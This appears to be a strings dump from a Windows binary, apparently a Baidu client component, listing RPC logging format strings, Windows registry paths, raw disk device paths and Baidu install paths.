---COMPOUDDOC---pStream->Stat error %x
---COMPOUDDOC---pStream->Write error %x
---COMPOUDDOC---pStream->SetSize error %x
APack addr=%p split_value=%d uid=%I64u
Init SoftParam local_ver=%d g_ver=%d
Init AccountParam local_ver=%d g_ver=%d
InitRequestPortoHeader sig_len=%d split_value=%d uid=%I64u
InitRequestPortoHeader Clear AccountParam
Update AccountParam local_ver=%d g_ver=%d
UpdateAccountParam sig_len=%d split_value=%d uid=%I64u
UpdateSoftParam local_ver=%d g_ver=%d
~RpcClient request_times=%d timeout_times=%d internal_req_times=%d
tRpcClient request_times=%d
AsyncRpcRequest serviceID=%d msgType=%d seq=%d
HandleRecv UnpackOK !! serviceID=%d msgType=%d seq=%d error=%d transfer_costtime=%d
HandleRecv Unpack Error !! serviceID=%d error=%d
HandleRecv CallBack !! serviceID=%d msgType=%d seq=%d error=%d callback_costtime=%d
eHandleRecv CallBack !! serviceID=%d msgType=%d error=%d callback_costtime=%d
tRpcClient timeout_times=%d
client internal_req_times=%d
close_for_destruct session=%d
close session=%d
async_request_coro send request !! seqno=%d
\StringFileInfo\xx\FileVersion
Kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
\Global.db
iphlpapi.dll
C\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe
%Documents and Settings%\All Users\Application Data\Baidu\bbservice\Config\
1, 1, 0, 2
3R3t3>